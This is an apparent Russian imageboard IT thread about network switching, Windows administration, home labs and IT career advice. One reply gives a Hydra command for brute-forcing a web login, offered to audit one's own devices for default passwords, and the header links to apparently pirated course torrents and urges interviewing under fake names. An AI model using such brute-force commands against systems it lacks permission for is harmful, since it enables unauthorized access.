>>1164561 имеется виду покупать L3 свичи на доступ аля Cisco 3650 у которых аплинковые порты будут сразу в роутед режиме (т.е. адрес вешается прям на порт, а не на SVI), у такого подхода есть как плюсы (полная утилизация всех аплинков) так и минусы (на каждом акцесс свиче свои вланы), самый топовый вариант Campus Fabric. На пике свичи аггрегации либо в стеке, либо MLAG, со стороны акцес свичей они выглядят как один.
>>1164576 >MLAG А он работает на l2? В случае ядра и агрегации, наверное да, там mlag, но вроде l2 коммутаторы в него не могут Или я путаю? >>1164570 > все коммутаторы умеют L3 Даже 2960? Он вроде не умеет делать no switchport Или я тут тоже путаю
>>1164598 >А он работает на l2? MLAG технология, которая поддерживается на L3 коммутаторах. На коммутаторах, которые L3 не понимают, просто не нужна его поддержка. >Даже 2960? Это надо даташиты смореть. Возможно какие-то из 2960 и умеют. Хотя сомневаюсь. Циска сейчас вообще позиционирует свои 3850 как коммутаторы доступа/распределения. Но по мне это очень уж круто лдя большинства конторок.
>>1164628 >IP Lite Рассказывай что это такое и с чем это едят
>>1164618 >Циска сейчас вообще позиционирует свои 3850 как коммутаторы доступа/распределения Я думаю, что они охуели, и вообще отказались от нищенских сегментов, Cisco Catalyst 2960-48, стоит сейчас тысяч 30, это я понимаю, приемлемо для мелко-средней конторы и 200к за 3850 - охуели мрази, что ли, 500$ vs 3000$, я думаю, что даже в яндексе не закупают такие коммутаторы, цена на порт безумная, особенно для рядовых юзеров и принтеров
>>1164690 >а серийник устройства можно как-нибудь получить? Попробуй проискать в display diagnostic-information Будет мноог лишнего, но серийник должен быть.
Какую винду для офиса сейчас стоит закупить? Поискать 7, или плюнуть и покупать 10? Семёрку через пару лет перестанут поддерживать, а у Десятки иппать сколько глюков. Недавно ещё пять штук в офис поставили, так у меня половина вызовов с этих компов. То одно отвалится, то другое не работает, то третье тормозит. Но за ней, как ни крути, мативо, будущее. Я, конечно, такое будущее в гробу видал, но против прогресса не попрёшь же.
Што-то я не понимаю. Есть l2 хуявей 2700. Я создал юзера, дал ему 3 лвл. Но в дефолтную веб-морду он зайти не может. По ssh при этом ходит без проблем.
Может, для морды есть какой-то отдельный сервис, который надо разрешить для этого юзера? Как-то я пока не понимаю логики работы хуявеев.
антонасы, отправляют меня ставить оборудование на точку, а я как-то и не шарю особо. в точке готовый канал, мне дадут 1 маршрутизатор и 3 коммутатора (много юзеров) маршрутизатор уже настроен под канал
насколько я понимаю, схема должно быть как на пикрл
1. есть ли на коммутаторах специальный порт, которым они соединяются друг с другом (а не с обычными хостами)? модель не знаю. какую дадут. ну обычно есть? или можно втыкать в любой порт, а маршрутизатор фактически будет думать, что это один большой коммутатор перед ним?
>>1165127 >есть ли на коммутаторах специальный порт, которым они соединяются друг с другом (а не с обычными хостами)? Обычно есть такие порты. При условии, что коммутатор управляемый и как-то изначально настроен. Если настраивал не ты, то тебе должны были сказать, в какой порт включать коммутатор. >что такое комбо wan порт? это для резервирования каналов, когда есть два вана? Не знаю, какая-то видимо маркетинговая терминология конкретного вендора. Схему я бы поменял, включив оба коммутатора в тот коммутатор, в который включен роутер.
>>1165139 >Подожди, это как? Я бы сделал вот так, как справа. Но все зависит от того, как в том офисе сделана СКС, может так не получится. Но это в общем-то не обязательно. Просто не люблю включать свитчи последовательно друг за другом, как-то это не принято, на мой взгляд.
>>1164748 По MS EA подписываешься на ту винду, которая продается, но имешь право даунгрейда. Семерка в личном кабинете еще есть. >>1164750 >аппрувеным апдейтом с всуса А на каком основании аппрувили, тогда уж?
>>1165148 >А как они называются? Они обычно выгляждят так. Их настраивают в режиме "trunk" как правило. Но если у тебя офис маленький, то нет надобности в таких коммутаторах.
>>1165177 на таком, что админ поставил автоапрув, а майки запустили обновление, которое убило шинду не могу найти новость лучше: http://www.ntv.ru/novosti/1939660/ Вот мы на это попали
>>1165199 >майки запустили обновление, которое убило шинду У них это регулярно. >админ поставил автоапрув С одной стороны, все ручками муторно, с другой - что ж, ССЗБ. По идее, нужен пул смертников на такой случай, куда апдейты аппрувятся автоматом. И если за неделю ничего не сломалось, то можно этот список одобрять и для всех.
>>1165335 > По идее, нужен пул смертников на такой случай, куда апдейты аппрувятся автоматом. И если за неделю ничего не сломалось, то можно этот список одобрять и для всех.
Это называется тестирование. И нормальные админы так и делают. Пусть обновы ставятся с опозданием в неделю, но хотя бы офис не ляжет в миг.
>>1165801 Они занимаются, просто бывают корявые апдейты, так как майки - пидорасы, и понимают, что никуда ты от них не уйдёшь Какая альтернатива АД ДС? ОпенЛДАП? да хуй там плава, или от ЛДАП от маков в цену выше на порядок У нас бедные эникеи бегали и восстанавливали с загрузочных дисков лол
Работаю год в конторе типа эникеем (на самом деле просто мальчиком, который с компуктерами ладит). Так вот я все это время ничего как администратор сети не делал. Хочу, так скажем, повысить свою квалификацию и полезность. С чего можно начать? Есть локальная сеть на рутере тплинк и коммутаторах, раскиданных по кабинетам. Можно администрировать сеть из 7 винды, не имея серверной оси? Дайте советов.
>>1165803 Сети начни с просмотра этого: https://www.youtube.com/watch?v=Z-a7MNStFQs Потом скачай и установи Wireshark, и потесть пакеты, которые ходят внутри сети, просто ради интереса, посмотри разные уровни и их заголовки
Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп
>>1165808 С wireshark'ом я уже по приколу сидел. >Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп Не понял. Нужно поставить серверную винду на виртуалку и обычную тоже на виртуалку? Это же для обучения только или можно с реальной сетью работать с виртуально серверной винды? >Без серверной ОС - нет Это же еще нужен компьютер, на котором сервер будет круглосуточно работать? Без нее нельзя впн сделать? Еще есть же всякие проги для администрирования сети или они не подходят?
>>1165830 >проги для администрирования сети Что ты имеешь в виду? Администрирование сети - это управление сетевыми устройствам. Но по факту у тебя, скорее всего, и управлять то нечем, кроме туполинк-роутера.
>>1165830 >С wireshark'ом я уже по приколу сидел. Тут суть в том, что бы понять уровни: биты/фреймы/пакеты понять заголовки всего, что куда и откуда, как вообще всё это ходит в сети, как разделяется одно от другого В вайршарк есть прямо три подпункта в каждом перехваченном кадре: заголовок кадра, заголовок IP пакета, заголовок TCP и сама информация внутри TCP >>Без серверной ОС - нет, но тебе придётся ставить виртуалку с 2012/2016 шиндой и делать виртуальную 7ку, для ввода её в домен, для ГПО/ДФС/ДНС и тп >Не понял. Нужно поставить серверную винду на виртуалку и обычную тоже на виртуалку? Это же для обучения только или можно с реальной сетью работать с виртуально серверной винды? 1 - во всём мире используется виртуализация, покупается сервак с 1/2/4 и более процессорами, и сотней гигов ОЗУ и на нём нарезаются виртуалки под задачи. Вообще так и делают покупают физических 1-2-3 сервака и делают десятки виртуалок. Тут есть наёб с лицензированием, например "лицензия на физический процессор" или "лицензия на 1 ЦПУ и 1 виртуалку" и тп На физический сервер ставят сразу ОС для виртуализации, то есть могут и без винда+Гипервизор, а чисто ВМВАР, и под ним уже режут как хотят 2 - ставь сначала для ознакомления, ты там по перваку столько дров наломаешь, что сам охуеешь, гугли вгугле VirtualBox, там можно создавать логические сети и объединять в них виртуальные ОС, вот первое задание для тебя: Поставь винсервер и подними DHCP + DNS, это просто и делается визардом, но что надо вводить в визарде придётся изучить >>Без серверной ОС - нет >Это же еще нужен компьютер, на котором сервер будет круглосуточно работать? Без нее нельзя впн сделать? Еще есть же всякие проги для администрирования сети или они не подходят? Прог никаких нету, прога для администрирования сети - путти, что бы ты мог по SSH цепляться в сетевому оборудованию и вводить команды.
Пока делай всё на своём ПК, просто тестируй и смотри как работает, на сеть в 7 ПК нету смысла делать какие-то сервера, я бы вообще поставил на такую сеть (я так и ставлю) дешманский кунап с 2 дисками для файловой помойки и роутер тысяч за 6 рублей, уровня RT-AC66U от ануса, он более-менее производительный, там удобная вебка и есть встроенный ВПН сервер
Для продакшена уже другие задачи, начни с того, что я написал выше - посмотри ролики и поставить ВиртуалБокс с 2012 виндой и 7кой
>>1165802 >Какая альтернатива АД ДС? ОпенЛДАП? Насколько мне известно опенлдап это именно лдап и только он, а АД это комбайнер огромный, с ключевой фишкой в групповых политиках. Вроде бы опенлдап в такое не может. Самба последняя может, и я даже видел её в роли домайн-контроллера, но пока это как-то ненадёжно выглядит.
ага, мань, я посмотрю куда ты будешь ставить оракл в продакшене, или proxy, или всякие там SIEM и DLP, только безумцы делают все исключительно на шиндоус, так это не работает жирнота
>>1165993 >Самба последняя может, и я даже видел её в роли домайн-контроллера, но пока это как-то ненадёжно выглядит.
Гуйню все равно от МС использовать, ибо так это ну просто пиздец. А в целом, Самба уже может быть контроллером, но с целой кучей костылей и ограничений.
Два с половиной года я и шеф сидели подали от начальства и основной движухи в другом корпусе аж через дорогу - ведь оборудованию и серверам похуй откуда их перезагружают.
И тут пошли новости что начальство переселяет нас в основной корпус аккурат в коридор, куда выходят кабинеты начальников управлений и отделов - чтобы было проще контролировать и ебать.
Дисциплину не нарушаем нарушаем так, чтобы остальные об этом не знали, по работе косяков за нами нет - а всё равно хотят переселить - безумные женщины-начальники с синдромом начальника.
И ведь это значит что НУЖНО БУДЕТ ПРИХОДИТЬ ВОВРЕМЯ АААРРР - а я уже так привык приходить позже на пол часа. А ещё будет нужно отмечаться в СКУД - когда у нас в корпусе этой системы вообще не установлено и вообще приходи/уходи когда хочешь - выпалить тебя могут только по телефонному звонку.
Увы - всё в этой жизни кончается. В том числе прекрасное сычевание в необорудованном СКУД корпусе на отшибе от начальства.
>>1166249 >Мимо студент учившийся на админа На админа надо учится? Я думал достаточно 9 классов и трехнедельных курсов. мимо менеджер ИТ-проектов/бизнес-аналитик из банка
Очень специфичный вопрос, но кто еще знает, если не ананас
Покупал ли кто-нибудь премиум на examcollection.com? Вопрос простейший и хуйня, но нужна информация именно от купившего подписку или скачавшего премиум файл у них
>>1167792 Ну так то что он смог занять место HR'а уже показатель его квалификации, это вообще-то не так просто. С админством по крайней мере не сравнится уж точно.
Пацаны, иксперты, искуственно интелектуалусы поясните за семантические сети и продукционные модели. Препод мне говорил что со слишком большими (1к+ элементов) сетями начинаются проблемы. Приведите реальные примеры таких проблем плиз, хочу изучить
>>1167986 >>1167986 Juniper VMX можно запускать под EVE, под GNS или просто под ESXi. Последний вариант - наиболее разумный, поскольку новые версии (17 и выше) жрут много ресурсов. Две виртуалки - VCP и VFP. На вфп и вцп нулевые интерфейсы - менеджмент, первые - надо соединить, чтобы они друг друга увидели. На вфп - эти интерфейсы - e1000. Далее на вфп надо добавить портов. Тип сетевухи для портов - VMXNET3. То есть на VFP машине - первые две сетевухи - e1000, остальные - VMXNET3. VCP - 1 проц и два гига памяти, VFP - 3 проца и 6 гигов. Должно взлететь. Если это слишком жирно для твоего сервака - попробуй VSRX или найди в сети бету 14 VMX (там одна виртуалка на все.) Но в VMX 14 не работает CoS, глючат фаерволы и нет всяких прикольных штук типа evpn.
Анончики, хочу вырваться из эникейного рабства и даже нашел нормальную вакансию, но есть одно но - требуют начального знания SQL, а я его не знаю от слова совсем. Ну, то есть я его видел, но никогда не использовал и, конечно, какую-нибудь сложную выборку придумать на ходу не смогу.
Т.к. они хотят именно начальный левел SQL, у меня есть надежда, что я смогу его задрочить и освоить за небольшой промежуток времени.
Так вот, анон, ты знаешь какой-нибудь годный тренажер по скулю? Желательно совмещенный с учебником/справочником? Чтение документации это очень увлекательно, но мою цель быстро освоить скуль не приблизит.
>>1171008 Я проходил там пайтон - платформа очень хорошая, чтобы быстро с чем-то познакомиться или что-то оперативно повторить. Сикуэль не знаю от слова совсем, но судя по содержанию курса - охват тем хороший.
>>1171008 Забыл сказать, что у sololearn отличное приложение под телефон/планшет - можно ботать где угодно, был бы инет. И почему-то в мобильной версии у меня курсы на русском языке, а как переключить язык в веб версии - ХЗ.
Господа, такой вопрос: есть ли инструмент для автоматического подбора дефолных логинов-паролей для сетевых устройств? Поясню. Работаю в конторе, много управляемых сетевых устройств разных вендоров - циски, длинки, 3комы, хуавеи, короче, зоопарк. Нужно просканить их (естессно, автоматически) на наличие незапароленных веб-морд. Т.е. наличие открытой веб-морды меня устраивает, мне лишь надо убедиться в том, что там не оставлен дефолтный admin:admin (причем они же могут быть разные для разных вендоров).
>>1171042 Есть такой инструмент, гидра называется. Для веб-морды работающей по GET можно вот так сбрутать: hydra -l user.txt -P pass.txt hostname http-get /login.php Разумеется, поддерживается и POST, и ftp, ssh и т.д. главное чтобы на стороне сервера таймаута не было после нескольких неудачных попыток.
Если у вас есть предложения по треду/шапке, ответьте комментом на этот пост. Ликуйте интересные обсуждения комментом в этот пост.
Начинающие! Если не хотите сидеть вечно на дне, то учите одно конкретное направление. Учить - это значит ебашить курсы и лабораторные по три-восемь часов в день каждый день, сдавать сертификационные экзамены, учить английский до беглого разговорного на IT тематику. Будете гонять балду - останетесь на дне.
В России IT нет, с небольшими исключениями ! Запомните это. В России в IT работать можно только в аутсорсерах на зарубежные компании, или в компаниях, которые выпускают IT продукты и сервисы, востребованные на мировом рынке. В остальных компаниях в России бюджеты на IT не большие, качество процессов внутри компании низкое, и это будет серьёзно влиять на ваше развитие.
Не ходите работать эникеями, не теряйте время. Пусть вашим первым опытом работы будет любая IT компания, и сразу идите на конкретную специализацию: линук админ, виндовс админ, сетевик, стораджист (storage admin), сервис деск (service desk) в конце концов. IT компания – это компания, где IT приносит основной доход, а не является обслуживающим подразделением. Провайдер, банк, контора разработчиков ПО - это IT компании. Завод, веб-студия, магазинная сеть – это не IT компании.
Уровень зарплат у состоявшихся квалифицированных специалистов с 8-10 годами опыта в Москве в IT – не менее 140000 руб., в идеале - 180-240 тыс.руб.
Переезжайте в другие города, если в вашем городе нет квалифицированной работы в IT. Меняйте компании легко, если у вас нет развития, не привязывайтесь к работадателям. Вы всегда себе работу найдёте, если у вас высокая квалификация. Подавайтесь на позиции и проходите собеседования по несколько раз в месяц, в том числе с фейковым именем и фейковым резюме. Не ссыте.
Готовьтесь к эмиграции. На всякий случай, не помешает. У вас одна из самых востребованных и гибких профессий. Попробуйте подаваться на вакансии зарубежом, посмотрите условия эмиграции (требования по закону и иммиграционным программам) и условия жизни.
Не тратьте много времени на женщин. Особенно, если они не разделяют ваших профессиональных интересов и тормозят ваше развитие, не дают переехать в другой город, и ебут мозг всяческими способами.
Бросьте игрушки и сериалы. Ибо нехуй. В отпуске поиграете и посмотрите.
Для программистов раздел /pr и тред "Мы вам перезвоним" в нём. Железо в /hw/, софт в /s/.
Для новичков: https://habrahabr.ru/post/118475/
RHCSA/RHCE:
magnet:?xt=urn:btih:C8915A6B4ED323C68FC0832E2FC37C2567464797&tr=http://bt3.t-ru.org/ann%3Fmagnet
magnet:?xt=urn:btih:A185A975BEAF0D33DCD2A1FADE9D885C1E85B7C8&tr=http://bt3.t-ru.org/ann%3Fmagnet
magnet:?xt=urn:btih:96C782EE746F06B9B7AF31ADE235B19725D242C8&tr=http://bt4.t-ru.org/ann%3Fmagnet
magnet:?xt=urn:btih:2DD6D93426A129913A48131E9C34A16AA05BCBE2&tr=http://bt2.t-ru.org/ann%3Fmagnet
RHCSA OpenStack: magnet:?xt=urn:btih:7C6B318ABE6D176F559AC569369D57A45BD34A36&tr=http://bt4.t-ru.org/ann%3Fmagnet
Тасклист для Linux админа: https://www.reddit.com/r/linuxadmin/comments/2s924h/how_did_you_get_your_start/cnnw1ma
Ютуб курс по Linux: https://www.youtube.com/user/itsemaev/playlists
Для сетевиков: http://xgu.ru/wiki/linkmeup
Курс CCNA: magnet:?xt=urn:btih:B0B3726CA5E04ECEC1937DBCF88BD733401BAF5D&dn=INE CCNA 200-120 videos 2014&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&tr=http%3a%2f%2fretracker.hq.ertelecom.ru%2fannounce
Сети для самых маленьких: http://linkmeup.ru/blog/11.html
MCSA/MCSE: magnet:?xt=urn:btih:EB96F52705BC14A7BF5C7B66C4D995238C78724C&tr=http://bt4.t-ru.org/ann%3Fmagnet
Книги: https://yadi.sk/d/qv4eEa8D3K3wdu
>Все друзья юристы 300к в секунду, а я все хуй за печенье сосу
>Мы тут нищие все, как бичи. Плохо кушаем, сил нет даже перекот сделать
>OSPF и BGP просты как палка
>И все хотят разговорный английский!
tg: https://t.me/it2ch (самый старый канал IT-тредов, с февраля 2016)
tg: https://t.me/joinchat/AAAAAEK0kjV2GSZKAJGYqg (свежесозданная, с 9 марта 2017)
Старые треды:
Архив шапки треда и ссылки на треды с 2012 года и до 18.08.2017 - https://pastebin.com/bnfw44ED
https://arhivach.org/thread/197078/ - 12.08.2016-30.08.2016 IT-тред #58 (#694827 ресертификация CCNP и CCDA; #695065 техподдержка-кун уволен; #696256 учебные курсы и сертификация VMware VCP)
https://arhivach.org/thread/201391/ - 30.08.2016-18.09.2016 IT-тред #59 (#704591 техподдержка-кун устроился на работу #705495, #700375 кто-то страдает по BGP, #701024 порядок поиска справочной информации, #701185 попытка вката в профессию, #704529 куда идти после техподдержки провайдера, #706561 и 716508 - ещё сертификация VMware/network virtualization, #707228 лабы по Red Hat Storage/ceph/gluster, #707418 требования для джуниора сетевика, #708048 перекат из дотера в админы, #712657 собеседование мейл ру куна/сетевик, #713978 миниопросник сетевиков, #716450 что значит "знать Active Directory по-минимуму", #717116 надрочить технический английский)
https://arhivach.org/thread/206505/ - 18.09.2016-14.10.2016 IT-тред #60
https://arhivach.org/thread/211561/ - 14.10.2016-03.11.2016 IT-тред #61 (#758298 - дешёвые виртуалки для выполнения лабораторок по vmware esxi/linux/windows)
https://arhivach.org/thread/213360/ - 03.11.2016-08.12.2016 IT-тред #62 ANIMU EDITION
IT-тред #63 https://2ch.hk/wrk/arch/2017-01-27/res/807705.html, там ничего интересного, кроме техподдержки-куна (будет скопировано ниже)
https://arhivach.org/thread/233978/ - 27.01.2017-08.03.2017 IT-тред #64
https://arhivach.org/thread/254730/ - 08.03.2017-17.04.2017 IT-тред #65 (#941909 - как я попал в рабство (тру стори, старая паста), #941464 - дотер-админ и там ниже по тексту интересно по развитию для сетевиков с CCIE-куном, #947098 сбер/сбертех, #949508 собеседование сетевика в Тинькофф банк, #956919 экзамен CCNP Route, #958426 не ходите на говнокурсы, #959679 CCIE унижает учит, #970362 сторадж-админ в треде, #974087 ошибки на интервью, #976694 техподдержка-кун выкарабкивается в админы, так же в треде есть бензоколонка-кун и scom-кун, #996356 собеседование в интегратор на Linux, #998619 тут неплохие рекомендации для начинающего сетевика ниже по треду, в целом тред про техподдержку)
https://arhivach.org/thread/262500/ - 17.04.2017-18.05.2017 IT-тред #66 (#1001276 менять ли работу, если есть предложения, но есть совесть и незаконченные проекты на текущей работе)
https://arhivach.org/thread/270233/ - 18/05/17-23/07/17 IT-тред #67 (#1043372 скиллы DevOps'а)
https://arhivach.org/thread/282577/ - 24/06/17-28/07/17 IT-тред #68
https://arhivach.org/thread/286265/ - 29/07/17 IT-тред #69 (в треде много сетевиков и про зарплаты в IT, #1081068 триал openshift'а, #1086307 190к руб. в 2014м, #1086534 направления развития в системах виртуализации)
https://arhivach.org/thread/294287/ - 16/08/17 ИТ-тред №70 (копаем vpn)
http://arhivach.org/thread/295697/ - 10/09/17 ИТ-тред №71
http://arhivach.org/thread/308599/ - 08/10/17 ИТ-тред №72 - вкатываемся
http://arhivach.org/thread/321536/ - 73 тред, интересно поясняют про сеть #1148119, разбор L3 #1147437 по косточкам